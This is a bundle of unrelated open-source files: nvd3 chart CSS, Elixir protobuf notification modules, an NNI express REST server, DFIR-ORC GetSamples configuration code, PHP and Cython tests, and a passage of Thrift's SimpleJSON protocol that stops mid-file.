.nvd3.nv-candlestickBar .nv-ticks .nv-tick {
  stroke-width: 1px;
}

.nvd3.nv-candlestickBar .nv-ticks .nv-tick.hover {
  stroke-width: 2px;
}

.nvd3.nv-candlestickBar .nv-ticks .nv-tick.positive rect {
  stroke: #2ca02c;
  fill: #2ca02c;
}

.nvd3.nv-candlestickBar .nv-ticks .nv-tick.negative rect {
  stroke: #d62728;
  fill: #d62728;
}

.with-transitions .nv-candlestickBar .nv-ticks .nv-tick {
  transition: stroke-width 250ms linear, stroke-opacity 250ms linear;
  -moz-transition: stroke-width 250ms linear, stroke-opacity 250ms linear;
  -webkit-transition: stroke-width 250ms linear, stroke-opacity 250ms linear;
}

.nvd3.nv-candlestickBar .nv-ticks line {
  stroke: #333;
}
{ "pile_set_name": "Github" }
defmodule Notifications.ExceptionInfo do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ class: String.t(), title: String.t(), msg: String.t(), backtrace: [String.t()] } defstruct [:class, :title, :msg, :backtrace] field :class, 1, type: :string field :title, 2, type: :string field :msg, 3, type: :string field :backtrace, 4, repeated: true, type: :string end defmodule Notifications.TimeInfo do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ start_time: String.t(), end_time: String.t() } defstruct [:start_time, :end_time] field :start_time, 1, type: :string field :end_time, 2, type: :string end defmodule Notifications.Profile.Control.Result do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ status: String.t(), code_desc: String.t(), run_time: float | :infinity | :negative_infinity | :nan, start_time: String.t(), message: String.t(), skip_message: String.t() } defstruct [:status, :code_desc, :run_time, :start_time, :message, :skip_message] field :status, 1, type: :string field :code_desc, 2, type: :string field :run_time, 3, type: :float field :start_time, 4, type: :string field :message, 5, type: :string field :skip_message, 6, type: :string end defmodule Notifications.Profile.Control.ResultTotals do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ num_tests: integer, num_failed_tests: integer, num_skipped_tests: integer, num_passed_tests: integer } defstruct [:num_tests, :num_failed_tests, :num_skipped_tests, :num_passed_tests] field :num_tests, 1, type: :int32 field :num_failed_tests, 2, type: :int32 field :num_skipped_tests, 3, type: :int32 field :num_passed_tests, 4, type: :int32 end defmodule Notifications.Profile.Control do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ id: String.t(), impact: float | :infinity | :negative_infinity | :nan, title: String.t(), code: String.t(), desc: String.t(), source_location: Notifications.SourceLocation.t() | nil, refs: [Notifications.Refs.t()], failed_results: [Notifications.Profile.Control.Result.t()], stats: Notifications.Profile.Control.ResultTotals.t() | nil } defstruct [:id, :impact, :title, :code, :desc, :source_location, :refs, :failed_results, :stats] field :id, 1, type: :string field :impact, 2, type: :float field :title, 3, type: :string field :code, 4, type: :string field :desc, 5, type: :string field :source_location, 6, type: Notifications.SourceLocation field :refs, 7, repeated: true, type: Notifications.Refs field :failed_results, 9, repeated: true, type: Notifications.Profile.Control.Result field :stats, 10, type: Notifications.Profile.Control.ResultTotals end defmodule Notifications.Profile.Attribute.Options do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ description: String.t() } defstruct [:description] field :description, 1, type: :string end defmodule Notifications.Profile.Attribute do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ name: String.t(), options: Notifications.Profile.Attribute.Options.t() | nil } defstruct [:name, :options] field :name, 1, type: :string field :options, 2, type: Notifications.Profile.Attribute.Options end defmodule Notifications.Profile.ControlTotals do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ num_tests: integer, num_failed_tests: integer, num_skipped_tests: integer, num_passed_tests: integer } defstruct [:num_tests, :num_failed_tests, :num_skipped_tests, :num_passed_tests] field :num_tests, 1, type: :int32 
field :num_failed_tests, 2, type: :int32 field :num_skipped_tests, 3, type: :int32 field :num_passed_tests, 4, type: :int32 end defmodule Notifications.Profile do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ name: String.t(), title: String.t(), version: String.t(), summary: String.t(), maintainer: String.t(), license: String.t(), copyright: String.t(), copyright_email: String.t(), sha256: String.t(), supports: [Notifications.PlatformSupport.t()], attributes: [Notifications.Profile.Attribute.t()], failed_controls: [Notifications.Profile.Control.t()], stats: Notifications.Profile.ControlTotals.t() | nil } defstruct [ :name, :title, :version, :summary, :maintainer, :license, :copyright, :copyright_email, :sha256, :supports, :attributes, :failed_controls, :stats ] field :name, 1, type: :string field :title, 2, type: :string field :version, 3, type: :string field :summary, 4, type: :string field :maintainer, 5, type: :string field :license, 6, type: :string field :copyright, 7, type: :string field :copyright_email, 8, type: :string field :sha256, 9, type: :string field :supports, 10, repeated: true, type: Notifications.PlatformSupport field :attributes, 11, repeated: true, type: Notifications.Profile.Attribute field :failed_controls, 12, repeated: true, type: Notifications.Profile.Control field :stats, 13, type: Notifications.Profile.ControlTotals end defmodule Notifications.SourceLocation do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ ref: String.t(), line: integer } defstruct [:ref, :line] field :ref, 1, type: :string field :line, 2, type: :int32 end defmodule Notifications.Refs do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ uri: String.t(), url: String.t() } defstruct [:uri, :url] field :uri, 2, type: :string field :url, 3, type: :string end defmodule Notifications.PlatformSupport do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ inspec: String.t(), os_name: String.t(), os_family: String.t(), release: String.t() } defstruct [:inspec, :os_name, :os_family, :release] field :inspec, 1, type: :string field :os_name, 2, type: :string field :os_family, 3, type: :string field :release, 4, type: :string end defmodule Notifications.ComplianceSuccess do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ id: String.t(), compliance_url: String.t(), node_name: String.t(), node_id: String.t(), end_time: String.t(), timestamp: String.t() } defstruct [:id, :compliance_url, :node_name, :node_id, :end_time, :timestamp] field :id, 1, type: :string field :compliance_url, 2, type: :string field :node_name, 3, type: :string field :node_id, 4, type: :string field :end_time, 5, type: :string field :timestamp, 6, type: :string end defmodule Notifications.ComplianceFailure.ControlTotals do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ skipped: integer, passed: integer, failed: integer, critical: integer, critical_failed: integer } defstruct [:skipped, :passed, :failed, :critical, :critical_failed] field :skipped, 1, type: :int32 field :passed, 2, type: :int32 field :failed, 3, type: :int32 field :critical, 4, type: :int32 field :critical_failed, 5, type: :int32 end defmodule Notifications.ComplianceFailure do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ id: String.t(), compliance_url: String.t(), node_name: String.t(), node_id: String.t(), inspec_version: String.t(), test_totals: Notifications.ComplianceFailure.ControlTotals.t() | nil, 
failed_profiles: [Notifications.Profile.t()], end_time: String.t(), timestamp: String.t() } defstruct [ :id, :compliance_url, :node_name, :node_id, :inspec_version, :test_totals, :failed_profiles, :end_time, :timestamp ] field :id, 1, type: :string field :compliance_url, 2, type: :string field :node_name, 3, type: :string field :node_id, 4, type: :string field :inspec_version, 5, type: :string field :test_totals, 6, type: Notifications.ComplianceFailure.ControlTotals field :failed_profiles, 7, repeated: true, type: Notifications.Profile field :end_time, 8, type: :string field :timestamp, 9, type: :string end defmodule Notifications.CCRFailure do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ run_id: String.t(), node_name: String.t(), node_url: String.t(), run_url: String.t(), cookbook: String.t(), recipe: String.t(), time: Notifications.TimeInfo.t() | nil, exception: Notifications.ExceptionInfo.t() | nil, timestamp: String.t() } defstruct [ :run_id, :node_name, :node_url, :run_url, :cookbook, :recipe, :time, :exception, :timestamp ] field :run_id, 1, type: :string field :node_name, 2, type: :string field :node_url, 3, type: :string field :run_url, 4, type: :string field :cookbook, 5, type: :string field :recipe, 6, type: :string field :time, 7, type: Notifications.TimeInfo field :exception, 8, type: Notifications.ExceptionInfo field :timestamp, 9, type: :string end defmodule Notifications.CCRSuccess do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ run_id: String.t(), node_name: String.t(), run_url: String.t(), time: Notifications.TimeInfo.t() | nil, updated_resource_count: integer, timestamp: String.t() } defstruct [:run_id, :node_name, :run_url, :time, :updated_resource_count, :timestamp] field :run_id, 1, type: :string field :node_name, 2, type: :string field :run_url, 3, type: :string field :time, 4, type: Notifications.TimeInfo field :updated_resource_count, 5, type: :int32 field :timestamp, 6, type: :string end defmodule Notifications.Response do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{} defstruct [] end defmodule Notifications.Event do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ event: {atom, any}, id: String.t() } defstruct [:event, :id] oneof :event, 0 field :id, 1, type: :string field :CCRSuccess, 2, type: Notifications.CCRSuccess, oneof: 0 field :CCRFailure, 3, type: Notifications.CCRFailure, oneof: 0 field :ComplianceSuccess, 4, type: Notifications.ComplianceSuccess, oneof: 0 field :ComplianceFailure, 5, type: Notifications.ComplianceFailure, oneof: 0 end
{ "pile_set_name": "Github" }
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT license.

'use strict';

import * as bodyParser from 'body-parser';
import * as express from 'express';
import * as path from 'path';
import * as component from '../common/component';
import { RestServer } from '../common/restServer'
import { getLogDir } from '../common/utils';
import { createRestHandler } from './restHandler';

/**
 * NNI Main rest server, provides rest API to support
 * # nnictl CLI tool
 * # NNI WebUI
 *
 */
@component.Singleton
export class NNIRestServer extends RestServer {
    private readonly API_ROOT_URL: string = '/api/v1/nni';
    private readonly LOGS_ROOT_URL: string = '/logs';

    /**
     * constructor to provide NNIRestServer's own rest property, e.g. port
     */
    constructor() {
        super();
    }

    /**
     * NNIRestServer's own router registration
     */
    protected registerRestHandler(): void {
        this.app.use(express.static('static'));
        this.app.use(bodyParser.json({limit: '50mb'}));
        this.app.use(this.API_ROOT_URL, createRestHandler(this));
        this.app.use(this.LOGS_ROOT_URL, express.static(getLogDir()));
        this.app.get('*', (req: express.Request, res: express.Response) => {
            res.sendFile(path.resolve('static/index.html'));
        });
    }
}
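
// --- Illustrative sketch added by the editor; not part of the original module ---
// A self-contained express app wired up with the same layout that
// registerRestHandler() uses above: static WebUI assets, a JSON body parser with
// a generous limit, a versioned REST prefix, and a catch-all route that serves
// index.html so client-side routing keeps working. The stub router, log path and
// port are placeholders, not NNI's real handler or configuration.
import * as bodyParser from 'body-parser';
import * as express from 'express';
import * as path from 'path';

const app = express();

// Stand-in for createRestHandler(this); the real handler exposes the NNI manager API.
const apiRouter = express.Router();
apiRouter.get('/check-status', (_req: express.Request, res: express.Response) => {
    res.json({ status: 'ok' });
});

app.use(express.static('static'));                 // bundled WebUI assets
app.use(bodyParser.json({ limit: '50mb' }));       // large payloads such as trial metrics
app.use('/api/v1/nni', apiRouter);                 // REST API under the versioned prefix
app.use('/logs', express.static('/tmp/nni/log'));  // assumed log directory, cf. getLogDir()
app.get('*', (_req: express.Request, res: express.Response) => {
    res.sendFile(path.resolve('static/index.html'));  // SPA fallback
});

app.listen(8080);                                  // placeholder port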
{ "pile_set_name": "Github" }
// // SPDX-License-Identifier: LGPL-2.1-or-later // // Copyright © 2011-2019 ANSSI. All Rights Reserved. // // Author(s): Jean Gautier (ANSSI) // #include "stdafx.h" #include "ParameterCheck.h" #include "ConfigFileReader.h" #include "TableOutputWriter.h" #include "SystemDetails.h" #include "GetSamples.h" #include "Temporary.h" #include "ConfigFile_GetSamples.h" #include "LogFileWriter.h" using namespace Orc; using namespace Orc::Command::GetSamples; namespace { void CheckGetThisConfiguration(Orc::Command::GetSamples::Main::Configuration& config) { if (config.getthisName.empty()) { config.getthisName = L"getthis.exe"; } if (config.getthisRef.empty()) { config.getthisRef = L"self:#"; } const std::wstring_view getThisCmd(L"getthis"); if (config.getthisArgs.empty()) { config.getthisArgs = getThisCmd; } else if (!equalCaseInsensitive(config.getthisArgs, getThisCmd, getThisCmd.length())) { // Avoid having to specify 'getthis' as first argument config.getthisArgs.insert(0, getThisCmd); config.getthisArgs.insert(getThisCmd.size(), L" "); } } } // namespace ConfigItem::InitFunction Main::GetXmlConfigBuilder() { return Orc::Config::GetSamples::root; } HRESULT Main::GetSchemaFromConfig(const ConfigItem& schemaitem) { config.sampleinfoOutput.Schema = TableOutput::GetColumnsFromConfig( _L_, config.sampleinfoOutput.TableKey.empty() ? L"SampleInfo" : config.sampleinfoOutput.TableKey.c_str(), schemaitem); config.timelineOutput.Schema = TableOutput::GetColumnsFromConfig( _L_, config.timelineOutput.TableKey.empty() ? L"SampleTimeline" : config.timelineOutput.TableKey.c_str(), schemaitem); return S_OK; } HRESULT Main::GetConfigurationFromArgcArgv(int argc, const WCHAR* argv[]) { HRESULT hr = E_FAIL; for (int i = 0; i < argc; i++) { switch (argv[i][0]) { case L'/': case L'-': if (OutputOption(argv[i] + 1, L"GetThisConfig", OutputSpec::File, config.getThisConfig)) ; else if (ParameterOption(argv[i] + 1, L"GetThisArgs", config.getthisArgs)) ; else if (OutputOption( argv[i] + 1, L"Out", static_cast<OutputSpec::Kind>(OutputSpec::Archive | OutputSpec::Directory), config.samplesOutput)) ; else if (!_wcsnicmp(argv[i] + 1, L"Autoruns", wcslen(L"Autoruns"))) { LPCWSTR pEquals = wcschr(argv[i], L'='); if (!pEquals) { if (BooleanOption(argv[i] + 1, L"Autoruns", config.bRunAutoruns)) continue; } else { if (SUCCEEDED(ExpandFilePath(pEquals + 1, config.autorunsOutput.Path))) { config.bLoadAutoruns = true; config.bKeepAutorunsXML = false; } else { if (FAILED(config.autorunsOutput.Configure(_L_, OutputSpec::File, pEquals + 1))) { log::Error(_L_, E_INVALIDARG, L"Invalid autoruns file specified: %s\r\n", pEquals + 1); return E_INVALIDARG; } else { config.bRunAutoruns = true; config.bKeepAutorunsXML = true; } } } } else if (OutputOption(argv[i] + 1, L"SampleInfo", OutputSpec::TableFile, config.sampleinfoOutput)) ; else if (OutputOption(argv[i] + 1, L"TimeLine", OutputSpec::TableFile, config.timelineOutput)) ; else if (OutputOption(argv[i] + 1, L"TempDir", OutputSpec::Directory, config.tmpdirOutput)) ; else if (FileSizeOption(argv[i] + 1, L"MaxPerSampleBytes", config.limits.dwlMaxBytesPerSample)) ; else if (FileSizeOption(argv[i] + 1, L"MaxTotalBytes", config.limits.dwlMaxBytesTotal)) ; else if (ParameterOption(argv[i] + 1, L"MaxSampleCount", config.limits.dwMaxSampleCount)) ; else if (BooleanOption(argv[i] + 1, L"NoLimits", config.limits.bIgnoreLimits)) ; else if (ParameterOption(argv[i] + 1, L"Compression", config.samplesOutput.Compression)) ; else if (ParameterOption(argv[i] + 1, L"Password", config.samplesOutput.Password)) ; 
else if (BooleanOption(argv[i] + 1, L"NoSigCheck", config.bNoSigCheck)) ; else if (EncodingOption(argv[i] + 1, config.csvEncoding)) { config.sampleinfoOutput.OutputEncoding = config.csvEncoding; config.timelineOutput.OutputEncoding = config.csvEncoding; } else if (ProcessPriorityOption(argv[i] + 1)) ; else if (UsageOption(argv[i] + 1)) ; else if (IgnoreCommonOptions(argv[i] + 1)) ; else { PrintUsage(); return E_INVALIDARG; } break; default: break; } } return S_OK; } HRESULT Main::GetConfigurationFromConfig(const ConfigItem& configitem) { HRESULT hr = E_FAIL; ConfigFile reader(_L_); if (FAILED( hr = config.samplesOutput.Configure( _L_, static_cast<OutputSpec::Kind>(OutputSpec::Archive | OutputSpec::Directory), configitem[GETSAMPLES_OUTPUT]))) return hr; if (FAILED( hr = config.sampleinfoOutput.Configure(_L_, OutputSpec::Kind::TableFile, configitem[GETSAMPLES_SAMPLEINFO]))) return hr; if (FAILED(hr = config.timelineOutput.Configure(_L_, OutputSpec::Kind::TableFile, configitem[GETSAMPLES_TIMELINE]))) return hr; hr = ProcessOptionAutorun(configitem); if (FAILED(hr)) { return hr; } if (FAILED(hr = config.tmpdirOutput.Configure(_L_, OutputSpec::Directory, configitem[GETSAMPLES_TEMPDIR]))) return hr; if (FAILED(hr = config.getThisConfig.Configure(_L_, OutputSpec::File, configitem[GETSAMPLES_GETTHIS_CONFIG]))) return hr; if (configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESPERSAMPLE]) { config.limits.dwlMaxBytesPerSample = (DWORD64)configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESPERSAMPLE]; } if (configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESTOTAL]) { config.limits.dwlMaxBytesTotal = (DWORD64)configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESTOTAL]; } if (configitem[GETSAMPLES_SAMPLES][CONFIG_MAXSAMPLECOUNT]) { config.limits.dwMaxSampleCount = (DWORD32)configitem[GETSAMPLES_SAMPLES][CONFIG_MAXSAMPLECOUNT]; } if (configitem[GETSAMPLES_NOLIMITS]) { config.limits.bIgnoreLimits = true; } if (configitem[GETSAMPLES_NOSIGCHECK]) { config.bNoSigCheck = true; } if (configitem[GETSAMPLES_GETTHIS]) { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXENAME]) { config.getthisName = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXENAME]; } WORD wArch = 0; if (FAILED(hr = SystemDetails::GetArchitecture(wArch))) return hr; switch (wArch) { case PROCESSOR_ARCHITECTURE_INTEL: if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]; } break; case PROCESSOR_ARCHITECTURE_AMD64: if (SystemDetails::IsWOW64()) { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]; } } else { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN64]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN64]; } } break; default: log::Error(_L_, hr, L"Unsupported architecture %d\r\n", wArch); return hr; } if (config.getthisRef.empty()) { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN]; } } if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_ARGS]) { config.getthisArgs = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_ARGS]; } } if (FAILED(hr = config.locs.AddLocationsFromConfigItem(configitem[GETSAMPLES_LOCATIONS]))) { log::Error(_L_, hr, L"Error in specific locations parsing in config file\r\n"); return hr; } if (FAILED(hr = config.locs.AddKnownLocations(configitem[GETSAMPLES_KNOWNLOCATIONS]))) { log::Error(_L_, hr, L"Error in 
known locations parsing\r\n"); return hr; } return S_OK; } HRESULT Main::CheckConfiguration() { HRESULT hr = E_FAIL; // TODO: make a function to use also in GetThis_config.cpp if (!config.limits.bIgnoreLimits && (config.limits.dwlMaxBytesTotal == INFINITE && config.limits.dwMaxSampleCount == INFINITE)) { log::Error( _L_, E_INVALIDARG, L"No global (at samples level, MaxBytesTotal or MaxSampleCount) has been set: set limits in configuration " L"or use /nolimits\r\n"); return E_INVALIDARG; } CheckGetThisConfiguration(config); if (config.bInstallNTrack && config.bRemoveNTrack) { log::Error(_L_, E_FAIL, L"Cannot install and remove NTrack in same command\r\n"); return E_FAIL; } if (config.tmpdirOutput.Path.empty()) { WCHAR szTempDir[MAX_PATH]; if (FAILED(hr = UtilGetTempDirPath(szTempDir, MAX_PATH))) { log::Error(_L_, hr, L"Failed to determine default temp folder\r\n"); return hr; } config.tmpdirOutput.Path = szTempDir; config.tmpdirOutput.Type = OutputSpec::Directory; } // we support only NTFS for now to get samples config.locs.Consolidate(false, FSVBR::FSType::NTFS); return S_OK; } HRESULT Main::ProcessOptionAutorun(const ConfigItem& item) { if (!item[GETSAMPLES_AUTORUNS]) { // Undefined option: do not try to execute Autoruns.exe config.bRunAutoruns = false; config.bLoadAutoruns = false; config.bKeepAutorunsXML = false; return S_OK; } HRESULT hr = config.autorunsOutput.Configure(_L_, OutputSpec::Kind::File, item[GETSAMPLES_AUTORUNS]); if (FAILED(hr)) { return hr; } if (config.autorunsOutput.Type == OutputSpec::None) { // Option is defined without any path: execute Autoruns.exe config.bRunAutoruns = true; config.bLoadAutoruns = false; config.bKeepAutorunsXML = false; return S_OK; } if (SUCCEEDED(VerifyFileExists(config.autorunsOutput.Path.c_str()))) { // Option is defined with an existing existing file path: do not execute Autoruns.exe, load file as input result config.bRunAutoruns = false; config.bLoadAutoruns = true; config.bKeepAutorunsXML = false; return S_OK; } // Option is defined with an non-existing file path: execute Autoruns.exe and keep its results in the provided path config.bRunAutoruns = true; config.bLoadAutoruns = false; config.bKeepAutorunsXML = true; return S_OK; }
{ "pile_set_name": "Github" }
<?php
/*
 * Copyright 2019 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

use Google\Auth\ApplicationDefaultCredentials;
use Google\Cloud\TestUtils\AppEngineDeploymentTrait;
use Google\Cloud\TestUtils\GcloudWrapper;
use GuzzleHttp\Client;
use GuzzleHttp\HandlerStack;
use PHPUnit\Framework\TestCase;

/**
 * Class DeployTest
 */
class DeployTest extends TestCase
{
    use AppEngineDeploymentTrait;

    private static $iapProjectId = 'cloud-iap-for-testing';
    private static $iapClientId = '1031437410300-ki5srmdg37qc6cl521dlqcmt4gbjufn5.apps.googleusercontent.com';

    /**
     * Check project env vars needed to deploy the application.
     * Override so GOOGLE_PROJECT_ID is not required.
     */
    private static function checkProjectEnvVars()
    {
    }

    /**
     * Deploy the application.
     * Override to set custom project ID for IAP
     */
    public static function deployApp()
    {
        // This has to go here because the requirements are out of order
        self::requireEnv('GOOGLE_APPLICATION_CREDENTIALS');

        // Deploy using the IAP project ID
        self::$gcloudWrapper = new GcloudWrapper(
            self::$iapProjectId,
            self::requireEnv('GOOGLE_VERSION_ID')
        );
        self::baseDeployApp();
    }

    /**
     * Set up the client.
     * Override to use ID Token auth for IAP
     *
     * @before
     */
    public function setUpClient()
    {
        $stack = HandlerStack::create();
        $stack->push(ApplicationDefaultCredentials::getIdTokenMiddleware(
            self::$iapClientId
        ));

        // create the HTTP client
        $this->client = new Client([
            'handler' => $stack,
            'auth' => 'google_auth',
            'base_uri' => self::getBaseUri(),
        ]);
    }

    public function testIndex()
    {
        $serviceAccountEmail = json_decode(file_get_contents(
            self::requireEnv('GOOGLE_APPLICATION_CREDENTIALS')
        ), true)['client_email'];
        $resp = $this->client->get('/');
        $this->assertEquals('200', $resp->getStatusCode());
        $this->assertContains(
            sprintf('<h1>Hello %s</h1>', $serviceAccountEmail),
            (string) $resp->getBody()
        );
    }
}
{ "pile_set_name": "Github" }
# mode: compile

cdef void foo():
    cdef int bool, int1=0, int2=0
    cdef float float1=0, float2=0
    cdef char *ptr1=NULL, *ptr2=NULL
    cdef int *ptr3

    bool = int1 == int2
    bool = int1 != int2
    bool = float1 == float2
    bool = ptr1 == ptr2
    bool = int1 == float2
    bool = ptr1 is ptr2
    bool = ptr1 is not ptr2

foo()
{ "pile_set_name": "Github" }
2 0 0 0 0 0 2 0 5 0 0 0 0 2 5 0 0 4 3 2 0 0 2 2 0 2 0 4 0 0 2 0 0 2 0 0 2 2 0 2 2 7 2 0 0 5 2 0 2 2 5 0 1 4 2 2 0 0 5 0 2 2 4 0 0 2 2 0 3 2 0 0 4 0 0 4 0 4 0 3 0 0 2 0 2 2 0 8 0 0 0 1 2 0 2 3 0 4 0 2 1 2 0 0 2 4 0 2 0 0 2 0 0 0 3 0 2 2 0 0 2 2 0 4 0 3 4 0 0 0 0 2 4 2 2 2 0 8 2 0 0 0 2 4 0 2 4 0 4 2 0 0 1 2 1 2 0 2 2 0 0 2 0 4 3 0 0 0 0 0 9 4 2 0 0 2 0 3 0 0 4 1 0 0 0 2 4 0 0 0 0 0 4 0 2 9 2 2 4 2 2 0 0 1 5 0 0 4 0 0 4 0 0 0 4 2 2 0 2 2 2 2 2 0 2 2 0 0 0 2 0 2 2 0 0 2 0 4 2 2 0 5 0 2 1 0 2 0 2 2 0 0 2 2 4 0 4 2 2 0 2 0 0 4 2 2 4 0 2 0 2 0 0 0 2 0 0 0 0 0 2 4 0 2 0 2 2 0
{ "pile_set_name": "Github" }
--TEST-- Test chop() function : usage variations - miscellaneous arguments --FILE-- <?php /* Prototype : string chop ( string $str [, string $charlist] ) * Description: Strip whitespace (or other characters) from the end of a string * Source code: ext/standard/string.c */ /* * Testing chop() : with miscellaneous arguments */ echo "*** Testing chop() : with miscellaneous arguments ***\n"; var_dump ( chop("chop test \t\0 ") ); /* without second Argument */ var_dump ( chop("chop test " , "") ); /* no characters in second Argument */ var_dump ( chop("chop test ", NULL) ); /* with NULL as second Argument */ var_dump ( chop("chop test ", true) ); /* with boolean value as second Argument */ var_dump ( chop("chop test ", " ") ); /* with single space as second Argument */ var_dump ( chop("chop test \t\n\r\0\x0B", "\t\n\r\0\x0B") ); /* with multiple escape sequences as second Argument */ var_dump ( chop("chop testABCXYZ", "A..Z") ); /* with characters range as second Argument */ var_dump ( chop("chop test0123456789", "0..9") ); /* with numbers range as second Argument */ var_dump ( chop("chop test$#@", "#@$") ); /* with some special characters as second Argument */ echo "Done\n"; ?> --EXPECTF-- *** Testing chop() : with miscellaneous arguments *** string(9) "chop test" string(12) "chop test " string(17) "chop test " string(17) "chop test " string(9) "chop test" string(10) "chop test " string(9) "chop test" string(9) "chop test" string(9) "chop test" Done
{ "pile_set_name": "Github" }
/* * Copyright (c) Facebook, Inc. and its affiliates. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <thrift/lib/cpp/protocol/TSimpleJSONProtocol.h> using namespace apache::thrift::transport; using namespace apache::thrift::reflection; namespace apache { namespace thrift { namespace protocol { TSimpleJSONProtocol::TSimpleJSONProtocol(std::shared_ptr<TTransport> ptrans) : TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>(ptrans), nextType_(nullptr), numSkipped_(0) {} TSimpleJSONProtocol::TSimpleJSONProtocol(TTransport* ptrans) : TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>(ptrans), nextType_(nullptr), numSkipped_(0) {} TSimpleJSONProtocol::~TSimpleJSONProtocol() {} /** * Writing functions. */ Schema* TSimpleJSONProtocol::getSchema() { return &schema_; } uint32_t TSimpleJSONProtocol::writeFieldBegin( const char* name, const TType /*fieldType*/, const int16_t /*fieldId*/) { return writeJSONString(name); } uint32_t TSimpleJSONProtocol::writeFieldEnd() { return 0; } uint32_t TSimpleJSONProtocol::writeMapBegin( const TType /*keyType*/, const TType /*valType*/, const uint32_t /*size*/) { return writeJSONObjectStart(); } uint32_t TSimpleJSONProtocol::writeMapEnd() { return writeJSONObjectEnd(); } uint32_t TSimpleJSONProtocol::writeListBegin( const TType /*elemType*/, const uint32_t /*size*/) { return writeJSONArrayStart(); } uint32_t TSimpleJSONProtocol::writeSetBegin( const TType /*elemType*/, const uint32_t /*size*/) { return writeJSONArrayStart(); } uint32_t TSimpleJSONProtocol::writeBool(const bool value) { return writeJSONBool(value); } /** * Reading functions */ void TSimpleJSONProtocol::setNextStructType(uint64_t reflection_id) { nextType_ = getDataTypeFromTypeNum(reflection_id); } uint32_t TSimpleJSONProtocol::readStructBegin(std::string& name) { uint32_t result = TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readStructBegin( name); enterType(); return result; } uint32_t TSimpleJSONProtocol::readStructEnd() { uint32_t result = TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readStructEnd(); exitType(); return result; } uint32_t TSimpleJSONProtocol::readFieldBegin( std::string& /*name*/, TType& fieldType, int16_t& fieldId) { uint32_t result = 0; auto currentType = getCurrentDataType(); skipWhitespace(); result += getNumSkippedChars(); // Check if we hit the end of the list uint8_t ch = reader_.peek(); if (ch == kJSONObjectEnd) { fieldType = T_STOP; return result; } std::string tmpStr; result += readJSONString(tmpStr); if (currentType != nullptr) { auto fields = currentType->fields_ref(); if (!fields) { throw TProtocolException( TProtocolException::INVALID_DATA, "Expected a struct type, but actually not a struct"); } // find the corresponding StructField object and field id of the field for (auto ite = fields->begin(); ite != fields->end(); ++ite) { if (*ite->second.name_ref() == tmpStr) { fieldId = ite->first; fieldType = getTypeIdFromTypeNum(*ite->second.type_ref()); // set the nextType_ if the field type is a compound type // e.g. 
